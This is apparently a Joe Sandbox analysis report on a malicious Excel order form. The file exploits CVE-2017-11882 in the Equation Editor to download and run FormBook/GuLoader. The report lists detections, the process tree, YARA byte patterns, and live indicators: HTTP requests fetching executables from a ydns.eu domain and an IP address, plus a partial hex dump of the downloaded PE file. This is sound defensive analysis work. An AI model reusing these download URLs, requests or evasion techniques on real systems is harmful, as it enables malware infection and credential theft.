Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Unique food order.xlsx

Overview

General Information

Sample Name:Unique food order.xlsx
Analysis ID:320235
MD5:f2cd263042fce1a4c2cbeed5f1676429
SHA1:608334d6c55e50f3447f865bca59e05b7b60e0cb
SHA256:f2f88e0287d17638c5d902a49d19b2c4e989dc2a511411ce959c91b642fb9359
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1552 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2408 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2692 cmdline: 'C:\Users\Public\vbc.exe' MD5: C05EEE88F0B57E853996957D6523397B)
      • vbc.exe (PID: 2868 cmdline: 'C:\Users\Public\vbc.exe' MD5: C05EEE88F0B57E853996957D6523397B)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • autoconv.exe (PID: 1664 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 09D786401F6CA6AEB16B2811B169F944)
          • NAPSTAT.EXE (PID: 1840 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 2168 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2408, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2408, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
      Sigma detected: Executables Started in Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: Execution in Non-Executable FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
      Sigma detected: Suspicious Program Location Process StartsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2408, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exeAvira URL Cloud: Label: malware
      Source: http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exeAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted fileShow sources
      Source: Unique food order.xlsxVirustotal: Detection: 24%Perma Link
      Source: Unique food order.xlsxReversingLabs: Detection: 22%
      Source: Unique food order.xlsxVirustotal: Detection: 24%Perma Link
      Source: Unique food order.xlsxReversingLabs: Detection: 22%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop esi9_2_00097295
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop esi9_2_000972A5
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop esi9_2_00097295
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop esi9_2_000972A5
      Source: global trafficDNS query: name: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      Source: global trafficDNS query: name: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.22:49166 -> 103.125.191.5:80
      Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.22:49166 -> 103.125.191.5:80
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Nov 2020 06:43:17 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 18 Nov 2020 21:48:32 GMTETag: "f000-5b4689298b6b3"Accept-Ranges: bytesContent-Length: 61440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a a6 b8 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 00 00 00 30 00 00 00 00 00 00 18 12 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 10 00 00 e9 b7 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 c3 00 00 3c 00 00 00 00 f0 00 00 f8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 30 00 00 00 00 10 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 b6 00 00 00 10 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 13 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 08 00 00 00 f0 00 00 00 10 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 ee 5b 23 58 18 00 00 00 c3 1f b0 49 23 00 00 00 00 00 00 00 00 00 00 00 55 53 45 52 33 32 2e 44 4c 4c 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Nov 2020 06:43:17 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 18 Nov 2020 21:48:32 GMTETag: "f000-5b4689298b6b3"Accept-Ranges: bytesContent-Length: 61440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a a6 b8 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 00 00 00 30 00 00 00 00 00 00 18 12 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 10 00 00 e9 b7 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 c3 00 00 3c 00 00 00 00 f0 00 00 f8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 30 00 00 00 00 10 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 b6 00 00 00 10 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 13 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 08 00 00 00 f0 00 00 00 10 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 ee 5b 23 58 18 00 00 00 c3 1f b0 49 23 00 00 00 00 00 00 00 00 00 00 00 55 53 45 52 33 32 2e 44 4c 4c 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
      Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
      Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5F9F InternetReadFile,5_2_001B5F9F
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5F9F InternetReadFile,5_2_001B5F9F
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to behavior
      Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
      Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com86f equals www.linkedin.com (Linkedin)
      Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com86f equals www.linkedin.com (Linkedin)
      Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: unknownDNS traffic detected: queries for: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      Source: unknownDNS traffic detected: queries for: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
      Source: vbc.exeString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
      Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY~f
      Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binq~f
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
      Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
      Source: vbc.exeString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
      Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY~f
      Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpString found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binq~f
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
